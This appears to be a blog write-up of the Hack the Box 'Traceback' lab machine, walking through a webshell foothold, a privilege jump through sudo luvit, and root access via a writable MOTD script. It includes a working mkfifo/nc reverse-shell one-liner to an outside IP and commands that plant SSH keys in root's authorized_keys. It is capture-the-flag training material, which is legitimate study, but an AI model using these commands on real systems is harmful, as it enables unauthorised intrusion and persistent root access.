Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP


The main web page shows a simple web page:

Looking in the Github repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine we can see there is one running:


Initial FootHold

Using admin:admin we can get access to a panel where we can upload files, list contents of directories etc...



Our first objective is to upload a php reverse shell (there are many on the internet) and get a shell:




We're in as user webadmin.
Next step is to enumerate other users

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

LUA is a scripting language.
It seems also that user webadmin can run luvit (lua interpreter) as user sysdamin via sudo  (no Password)

The obvious step here is to create a script like /tmp/nik.lua


1
os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as

1
sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua


And get a shell as sysadmin

Root Flag

As sysadmin thhe next step is enumeration with tools like LinEnum or similar.
But it seems that there is nothing interesting
Looking with pspy to see running processes we can see that there is a recurrent task:

There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every 1 minute.
Interesting... looks something that cleans corrupted files..

Infact user sysdamin can modify all files in /etc/

The interesting thing is that sshd will run this file as root to show the MOTD and additional messages to all ssh session created.

So we can modify one the files above to run command as root and gain access, but we have to be fast because in one minute the file will be cleaned up.
The sequence of operation to do is:

  • Add our public ssh key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also upload our key for further use)

  • Run  the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header adding our code to be executed at next ssh session

  • Logon as sysadmin by ssh (we should be able to do this as we added the key). This operation should result in execution of  cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys

  • Logon as root (the previous command should have added our key to root authorized keys) 


By -
Labels:

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)